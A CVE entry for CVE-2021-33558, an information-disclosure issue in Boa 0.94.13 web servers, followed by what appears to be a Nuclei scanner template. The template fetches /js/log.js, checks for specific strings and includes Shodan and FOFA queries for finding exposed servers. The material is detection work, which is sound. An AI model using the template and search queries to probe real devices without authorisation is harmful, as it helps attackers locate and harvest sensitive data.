Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE- multiple third parties report that this is a site-specific issue because those files are not part of Boa.
PoC代码[已公开]
id: CVE-2021-33558
info:
name: Boa 0.94.13 - Information Disclosure
author: DhiyaneshDK
severity: high
description: |
Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE- multiple third parties report that this is a site-specific issue because those files are not part of Boa.
reference:
- https://sourceforge.net/projects/boa/files/boa/0.94.13/
- https://github.com/anldori/CVE-2021-33558
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-33558
epss-score: 0.93409
epss-percentile: 0.99804
cpe: cpe:2.3:a:boa:boa:0.94.13:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: boa
product: boa
shodan-query: 'Server: Boa/0.94.13'
fofa-query: "Server: Boa/0.94.13"
tags: cve,cve2021,boa,info-leak,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/js/log.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "function SearchLog"
- "logTime"
condition: and
case-insensitive: true
- type: status
status:
- 200
# digest: 4a0a00473045022100c644702537908bb3a5875afb7cff510c7831cdd2c5de0368fe0adddbd2608b1f02207193e3cb0bcbb27bba0520cc0a9545a1c919b8167cf0b6cc15a1e7037067d7d4:922c64590222798bb761d5b6d8e72950